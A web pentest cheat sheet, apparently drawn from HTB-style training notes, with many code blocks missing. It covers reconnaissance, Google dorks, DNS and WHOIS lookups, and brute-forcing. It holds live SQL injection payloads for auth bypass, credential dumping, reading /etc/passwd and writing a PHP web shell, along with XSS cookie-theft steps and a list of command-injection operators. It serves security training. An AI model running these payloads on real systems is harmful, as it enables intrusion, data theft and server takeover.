Web pentest cheatsheet
Last updated
Last updated
Consider utilizing web spiders such as , , and for extracting data from websites
Certificate Transparency (CT) logs offer a treasure trove of subdomain information for passive reconnaissance. These publicly accessible logs record SSL/TLS certificates issued for domains and their subdomains, serving as a security measure to prevent fraudulent certificates. For reconnaissance, they offer a window into potentially overlooked subdomains.
The crt.sh
website provides a searchable interface for CT logs. To efficiently extract subdomains using crt.sh
within your terminal, you can use a command like this:
This command fetches JSON-formatted data from crt.sh
for example.com
(the %
is a wildcard), extracts domain names using jq
, removes any wildcard prefixes (*.
) with sed
, and finally sorts and deduplicates the results.
is also a great resource for internet connecte devices, advanced filtering by domain, IP or certificate attributes.
Web crawling is the automated exploration of a website's structure. A web crawler, or spider, systematically navigates through web pages by following links, mimicking a user's browsing behavior. This process maps out the site's architecture and gathers valuable information embedded within the pages.
A crucial file that guides web crawlers is robots.txt
. This file resides in a website's root directory and dictates which areas are off-limits for crawlers. Analyzing robots.txt
can reveal hidden directories or sensitive areas that the website owner doesn't want to be indexed by search engines.
Scrapy
is a powerful and efficient Python framework for large-scale web crawling and scraping projects. It provides a structured approach to defining crawling rules, extracting data, and handling various output formats.
Here's a basic Scrapy spider example to extract links from example.com
:
Code: python
After running the Scrapy spider, you'll have a file containing scraped data (e.g., example_data.json
). You can analyze these results using standard command-line tools. For instance, to extract all links:
Code: bash
This command uses jq
to extract links, awk
to isolate file extensions, sort
to order them, and uniq -c
to count their occurrences. By scrutinizing the extracted data, you can identify patterns, anomalies, or sensitive files that might be of interest for further investigation.
Leveraging search engines for reconnaissance involves utilizing their vast indexes of web content to uncover information about your target. This passive technique, often referred to as Open Source Intelligence (OSINT) gathering, can yield valuable insights without directly interacting with the target's systems.
By employing advanced search operators and specialized queries known as "Google Dorks," you can pinpoint specific information buried within search results. Here's a table of some useful search operators for web reconnaissance:
site:
Limits results to a specific website or domain.
site:example.com
Find all publicly accessible pages on example.com.
inurl:
Finds pages with a specific term in the URL.
inurl:login
Search for login pages on any website.
filetype:
Searches for files of a particular type.
filetype:pdf
Find downloadable PDF documents.
intitle:
Finds pages with a specific term in the title.
intitle:"confidential report"
Look for documents titled "confidential report" or similar variations.
intext:
or inbody:
Searches for a term within the body text of pages.
intext:"password reset"
Identify webpages containing the term “password reset”.
cache:
Displays the cached version of a webpage (if available).
cache:example.com
View the cached version of example.com to see its previous content.
link:
Finds pages that link to a specific webpage.
link:example.com
Identify websites linking to example.com.
related:
Finds websites related to a specific webpage.
related:example.com
Discover websites similar to example.com.
info:
Provides a summary of information about a webpage.
info:example.com
Get basic details about example.com, such as its title and description.
define:
Provides definitions of a word or phrase.
define:phishing
Get a definition of "phishing" from various sources.
numrange:
Searches for numbers within a specific range.
site:example.com numrange:1000-2000
Find pages on example.com containing numbers between 1000 and 2000.
allintext:
Finds pages containing all specified words in the body text.
allintext:admin password reset
Search for pages containing both "admin" and "password reset" in the body text.
allinurl:
Finds pages containing all specified words in the URL.
allinurl:admin panel
Look for pages with "admin" and "panel" in the URL.
allintitle:
Finds pages containing all specified words in the title.
allintitle:confidential report 2023
Search for pages with "confidential," "report," and "2023" in the title.
AND
Narrows results by requiring all terms to be present.
site:example.com AND (inurl:admin OR inurl:login)
Find admin or login pages specifically on example.com.
OR
Broadens results by including pages with any of the terms.
"linux" OR "ubuntu" OR "debian"
Search for webpages mentioning Linux, Ubuntu, or Debian.
NOT
Excludes results containing the specified term.
site:bank.com NOT inurl:login
Find pages on bank.com excluding login pages.
*
(wildcard)
Represents any character or word.
site:socialnetwork.com filetype:pdf user* manual
Search for user manuals (user guide, user handbook) in PDF format on socialnetwork.com.
..
(range search)
Finds results within a specified numerical range.
site:ecommerce.com "price" 100..500
Look for products priced between 100 and 500 on an e-commerce website.
" "
(quotation marks)
Searches for exact phrases.
"information security policy"
Find documents mentioning the exact phrase "information security policy".
-
(minus sign)
Excludes terms from the search results.
site:news.com -inurl:sports
Search for news articles on news.com excluding sports-related content.
Google Dorking, also known as Google Hacking, is a technique that leverages the power of search operators to uncover sensitive information, security vulnerabilities, or hidden content on websites, using Google Search.
Finding Login Pages:
site:example.com inurl:login
site:example.com (inurl:login OR inurl:admin)
Identifying Exposed Files:
site:example.com filetype:pdf
site:example.com (filetype:xls OR filetype:docx)
Uncovering Configuration Files:
site:example.com inurl:config.php
site:example.com (ext:conf OR ext:cnf)
(searches for extensions commonly used for configuration files)
Locating Database Backups:
site:example.com inurl:backup
site:example.com filetype:sql
By creatively combining these operators and crafting targeted queries, you can uncover sensitive documents, exposed directories, login pages, and other valuable information that may aid in your reconnaissance efforts.
There is a good resource that I found allowing you to generate interesting queries for Github, Shodan and Google:
The wayback mahcine is a digital archive of the World Wide Web. It allows the users to go back in time and view snapshots of a website. The Wayback Machine operates by using web crawlers to capture snapshots of websites at regular intervals automatically. These crawlers navigate through the web, following links and indexing pages, much like how search engine crawlers work. However, instead of simply indexing the information for search purposes, the Wayback Machine stores the entire content of the pages, including HTML, CSS, JavaScript, images, and other resources. Factors that influence this frequency include the website's popularity, its rate of change, and the resources available to the Internet Archive.
These frameworks aim to provide a complete suite of tools for web reconnaissance:
Use HTTPRECON for general web reconnaissance. An example for tool execution could be:
To use dnsenum
for subdomain brute-forcing, you'll typically provide it with the target domain and a wordlist containing potential subdomain names. The tool will then systematically query the DNS server for each potential subdomain and report any that exist.
-r
: This option enables recursive subdomain brute-forcing, meaning that if dnsenum
finds a subdomain, it will then try to enumerate subdomains of that subdomain.
The Domain Name System (DNS) functions as the internet's GPS, translating user-friendly domain names into the numerical IP addresses computers use to communicate. Like GPS converting a destination's name into coordinates, DNS ensures your browser reaches the correct website by matching its name with its IP address. This eliminates memorizing complex numerical addresses, making web navigation seamless and efficient.
The dig
command allows you to query DNS servers directly, retrieving specific information about domain names. For instance, if you want to find the IP address associated with example.com
, you can execute the following command:
This command instructs dig
to query the DNS for the A
record (which maps a hostname to an IPv4 address) of example.com
. The output will typically include the requested IP address, along with additional details about the query and response. By mastering the dig
command and understanding the various DNS record types, you gain the ability to extract valuable information about a target's infrastructure and online presence.
Before using the whois
command, you'll need to ensure it's installed on your Linux system. It's a utility available through linux package managers, and if it's not installed, it can be installed simply with
Utilising WHOIS
The simplest way to access WHOIS data is through the whois
command-line tool. Let's perform a WHOIS lookup on facebook.com
:
Utilising WHOIS
The WHOIS output for facebook.com
reveals several key details:
Domain Registration
:
Registrar
: RegistrarSafe, LLC
Creation Date
: 1997-03-29
Expiry Date
: 2033-03-30
These details indicate that the domain is registered with RegistrarSafe, LLC, and has been active for a considerable period, suggesting its legitimacy and established online presence. The distant expiry date further reinforces its longevity.
Domain Owner
:
Registrant/Admin/Tech Organization
: Meta Platforms, Inc.
Registrant/Admin/Tech Contact
: Domain Admin
This information identifies Meta Platforms, Inc. as the organization behind facebook.com
, and "Domain Admin" as the point of contact for domain-related matters. This is consistent with the expectation that Facebook, a prominent social media platform, is owned by Meta Platforms, Inc.
Domain Status
:
clientDeleteProhibited
, clientTransferProhibited
, clientUpdateProhibited
, serverDeleteProhibited
, serverTransferProhibited
, and serverUpdateProhibited
These statuses indicate that the domain is protected against unauthorized changes, transfers, or deletions on both the client and server sides. This highlights a strong emphasis on security and control over the domain.
Name Servers
:
A.NS.FACEBOOK.COM
, B.NS.FACEBOOK.COM
, C.NS.FACEBOOK.COM
, D.NS.FACEBOOK.COM
These name servers are all within the facebook.com
domain, suggesting that Meta Platforms, Inc. manages its DNS infrastructure. It is common practice for large organizations to maintain control and reliability over their DNS resolution.
Overall, the WHOIS output for facebook.com
aligns with expectations for a well-established and secure domain owned by a large organization like Meta Platforms, Inc.
While the WHOIS record provides contact information for domain-related issues, it might not be directly helpful in identifying individual employees or specific vulnerabilities. This highlights the need to combine WHOIS data with other reconnaissance techniques to understand the target's digital footprint comprehensively.
DNS zone transfers, also known as AXFR (Asynchronous Full Transfer) requests, offer a potential goldmine of information for web reconnaissance. A zone transfer is a mechanism for replicating DNS data across servers. When a zone transfer is successful, it provides a complete copy of the DNS zone file, which contains a wealth of details about the target domain.
To attempt a zone transfer, you can use the dig
command with the axfr
(full zone transfer) option. For example, to request a zone transfer from the DNS server ns1.example.com
for the domain example.com
, you would execute:
Code: bash
However, zone transfers are not always permitted. Many DNS servers are configured to restrict zone transfers to authorized secondary servers only. Misconfigured servers, though, may allow zone transfers from any source, inadvertently exposing sensitive information.
Virtual hosting is a technique that allows multiple websites to share a single IP address. Each website is associated with a unique hostname, which is used to direct incoming requests to the correct site. This can be a cost-effective way for organizations to host multiple websites on a single server, but it can also create a challenge for web reconnaissance.
Since multiple websites share the same IP address, simply scanning the IP won't reveal all the hosted sites. You need a tool that can test different hostnames against the IP address to see which ones respond.
Gobuster is a versatile tool that can be used for various types of brute-forcing, including virtual host discovery. Its vhost
mode is designed to enumerate virtual hosts by sending requests to the target IP address with different hostnames. If a virtual host is configured for a specific hostname, Gobuster will receive a response from the web server.
To use Gobuster to brute-force virtual hosts, you'll need a wordlist containing potential hostnames. Here's an example command:
Use Wfuzz to replace "FUZZ" with words from your wordlist to identify subdomains:
Specify the -x
option to filter on specific extensions:
Use Gobuster to guess directories and subdomains of a specific web application:
Note: You can use wordlists located in /usr/share/wordlists/*
.
Use Nmap to enumerate directories on a target website:
You can also use Burpsuite intruder and Dirbuster to discover content on the webapplication
These commands are utilized for discovering directories on a web server, detecting vulnerabilities such as ShellShock, and potentially exploiting these vulnerabilities to gain unauthorized access or execute commands on the server.
Footprint a website for web directory structure:
Perform a dynamic scan to extract emails, backdoors, and external hosts:
Detect host mappings using:
Detect web application firewalls:
Trace HTTP requests:
Before we start subverting the web application's logic and attempting to bypass the authentication, we first have to test whether the login form is vulnerable to SQL injection. To do that, we will try to add one of the below payloads after our username and see if it causes any errors or changes how the page behaves:
In some cases, we may have to use the URL encoded version of the payload. An example of this is when we put our payload directly in the URL 'i.e. HTTP GET request'.
'
%27
"
%22
#
%23
;
%3B
)
%29
Command
Description
General
mysql -u root -h docker.hackthebox.eu -P 3306 -p
login to mysql database
SHOW DATABASES
List available databases
USE users
Switch to database
Tables
CREATE TABLE logins (id INT, ...)
Add a new table
SHOW TABLES
List available tables in current database
DESCRIBE logins
Show table properties and columns
INSERT INTO table_name VALUES (value_1,..)
Add values to table
INSERT INTO table_name(column2, ...) VALUES (column2_value, ..)
Add values to specific columns in a table
UPDATE table_name SET column1=newvalue1, ... WHERE <condition>
Update table values
Columns
SELECT * FROM table_name
Show all columns in a table
SELECT column1, column2 FROM table_name
Show specific columns in a table
DROP TABLE logins
Delete a table
ALTER TABLE logins ADD newColumn INT
Add new column
ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn
Rename column
ALTER TABLE logins MODIFY oldColumn DATE
Change column datatype
ALTER TABLE logins DROP oldColumn
Delete column
Output
SELECT * FROM logins ORDER BY column_1
Sort by column
SELECT * FROM logins ORDER BY column_1 DESC
Sort by column in descending order
SELECT * FROM logins ORDER BY column_1 DESC, id ASC
Sort by two-columns
SELECT * FROM logins LIMIT 2
Only show first two results
SELECT * FROM logins LIMIT 1, 2
Only show first two results starting from index 2
SELECT * FROM table_name WHERE <condition>
List results that meet a condition
SELECT * FROM logins WHERE username LIKE 'admin%'
List results where the name is similar to a given string
Division (/
), Multiplication (*
), and Modulus (%
)
Addition (+
) and Subtraction (-
)
Comparison (=
, >
, <
, <=
, >=
, !=
, LIKE
)
NOT (!
)
AND (&&
)
OR (||
)
Auth Bypass
admin' or '1'='1
Basic Auth Bypass
admin' or 1 = 1 -- -
admin')-- -
Basic Auth Bypass With comments
Union Injection
' order by 1-- -
Detect number of columns using order by
cn' UNION select 1,2,3-- -
Detect number of columns using Union injection
cn' UNION select 1,@@version,3,4-- -
Basic Union injection
UNION select username, 2, 3, 4 from passwords-- -
Union injection for 4 columns
DB Enumeration
SELECT @@version
Fingerprint MySQL with query output
SELECT SLEEP(5)
Fingerprint MySQL with no output
cn' UNION select 1,database(),2,3-- -
Current database name
cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -
List all databases
cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -
List all tables in a specific database
cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -
List all columns in a specific table
cn' UNION select 1, username, password, 4 from dev.credentials-- -
Dump data from a table in another database
Privileges
cn' UNION SELECT 1, user(), 3, 4-- -
Find current user
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -
Find if user has admin privileges
cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -
Find if all user privileges
cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -
Find which directories can be accessed through MySQL
File Injection
cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -
Read local file
select 'file written successfully!' into outfile '/var/www/html/proof.txt'
Write a string to a local file
cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -
Write a web shell into the base web directory
- Use the following command to test a specific IP or URL for SQL injection vulnerabilities:
Tamper-Script
Description
0eunion
Replaces instances of UNION with e0UNION
base64encode
Base64-encodes all characters in a given payload
between
Replaces greater than operator (>
) with NOT BETWEEN 0 AND #
and equals operator (=
) with BETWEEN # AND #
commalesslimit
Replaces (MySQL) instances like LIMIT M, N
with LIMIT N OFFSET M
counterpart
equaltolike
Replaces all occurrences of operator equal (=
) with LIKE
counterpart
halfversionedmorekeywords
Adds (MySQL) versioned comment before each keyword
modsecurityversioned
Embraces complete query with (MySQL) versioned comment
modsecurityzeroversioned
Embraces complete query with (MySQL) zero-versioned comment
percentage
Adds a percentage sign (%
) in front of each character (e.g. SELECT -> %S%E%L%E%C%T)
plus2concat
Replaces plus operator (+
) with (MsSQL) function CONCAT() counterpart
randomcase
Replaces each keyword character with random case value (e.g. SELECT -> SEleCt)
space2comment
Replaces space character (
) with comments `/
space2dash
Replaces space character (
) with a dash comment (--
) followed by a random string and a new line ()
space2hash
Replaces (MySQL) instances of space character (
) with a pound character (#
) followed by a random string and a new line ()
space2mssqlblank
Replaces (MsSQL) instances of space character (
) with a random blank character from a valid set of alternate characters
space2plus
Replaces space character (
) with plus (+
)
space2randomblank
Replaces space character (
) with a random blank character from a valid set of alternate characters
symboliclogical
Replaces AND and OR logical operators with their symbolic counterparts (&&
and ||
)
versionedkeywords
Encloses each non-function keyword with (MySQL) versioned comment
versionedmorekeywords
Encloses each keyword with (MySQL) versioned comment
To create a more stable reverse shell, use the following payload:
Exploit local file inclusion vulnerabilities using direct HTTP requests:
The inclusion occurs due to the include()
function in PHP, where directory traversal allows unauthorized file access.
XSS vulnerabilities take advantage of a flaw in user input sanitization to "write" JavaScript code to the page and execute it on the client side, leading to several types of attacks.
Results:
To return the victim's to the original page and reduce suspicions, we can host a PHP page on our webserver.
PHP Example code that we can place under /tmp/tmpserver/
and call it index.php
(Don't forget to change the Server_IP to the website or IP that you are testing)
Especially if the angels are HTML encoded and being escaped
href
attribute with double quotes HTML-encodedIf we identify XSS, we can use it to steal user's cookies with the following example approach.
Host a PHP script on your webserver that would capture a parameter and save it's content to a file
Inject one of the following payloads to steal the user's cookies through XSS
If the XSS is successfull, we would get the user's cookies from the cookie.txt file
While reflected XSS
sends the input data to the back-end server through HTTP requests, DOM XSS is completely processed on the client-side through JavaScript. DOM XSS occurs when JavaScript is used to change the page source through the Document Object Model (DOM)
. If the parameter starts with "#" like in this example http://SERVER_IP:PORT/
#task
=<img src=
it means that the parameter is executed by the Javascript through DOM
JQuery vulnerable code - DOM XSS
Executing stuff inside the href attribute
XSSSTRIKE is a powerful python tool that allows you to automate the detection of XSS vulnerabilities on parameters:
If you get an error from python when you try to install the requirements, you might need to create a virtual environment : which allow you to manage Python packages independently of the system Python.
Other useful resources with interesting XSS payloads:
Semicolon
;
%3b
Both
New Line
\n
%0a
Both
Background
&
%26
Both (second output generally shown first)
Pipe
|
%7c
Both (second output is shown)
AND
&&
%26%26
Both (only if first succeeds)
OR
||
%7c%7c
Second (only if first fails)
Sub-Shell
``
%60%60
Both (Linux-only)
Sub-Shell
$()
%24%28%29
Both (Linux-only)
Bashfuscator: Once we have the tool set up, we can start using it from the ./bashfuscator/bin/
directory. There are many flags we can use with the tool to fine-tune our final obfuscated command, as we can see in the -h
help menu.
Here are some common examples of Google Dorks, for more examples, refer to the :
: A Python-based reconnaissance tool offering a range of modules for different tasks like SSL certificate checking, Whois information gathering, header analysis, and crawling. Its modular structure enables easy customisation for specific needs.
: A powerful framework written in Python that offers a modular structure with various modules for different reconnaissance tasks. It can perform DNS enumeration, subdomain discovery, port scanning, web crawling, and even exploit known vulnerabilities.
: Specifically designed for gathering email addresses, subdomains, hosts, employee names, open ports, and banners from different public sources like search engines, PGP key servers, and the SHODAN database. It is a command-line tool written in Python.
: An open-source intelligence automation tool that integrates with various data sources to collect information about a target, including IP addresses, domain names, email addresses, and social media profiles. It can perform DNS lookups, web crawling, port scanning, and more.
: A collection of various tools and resources for open-source intelligence gathering. It covers a wide range of information sources, including social media, search engines, public records, and more.
web extension can also be used to identify website technologies
is a Web technology profiler that provides detailed reports on a website's technology stack.
The MySQL documentation for states that the AND
operator would be evaluated before the OR
operator. This means that if there is at least one TRUE
condition in the entire query along with an OR
operator, the entire query will evaluate to TRUE
since the OR
operator returns TRUE
if one of its operands is TRUE
.
Note: To write a web shell, we must know the base web directory for the web server (i.e. web root). One way to find it is to use load_file
to read the server configuration, like Apache's configuration found at /etc/apache2/apache2.conf
, Nginx's configuration at /etc/nginx/nginx.conf
, or IIS configuration at %WinDir%\System32\Inetsrv\Config\ApplicationHost.config
, or we can search online for other possible configuration locations. Furthermore, we may run a fuzzing scan and try to write files to different possible web roots, using or . Finally, if none of the above works, we can use server errors displayed to us and try to find the web directory that way.
To learn more about the basics of XSS, refer to this section
DOSfuscation: There is also a very similar tool that we can use for Windows called . Unlike Bashfuscator
, this is an interactive tool, as we run it once and interact with it to get the desired obfuscated command. We can once again clone the tool from GitHub and then invoke it through PowerShell, as follows: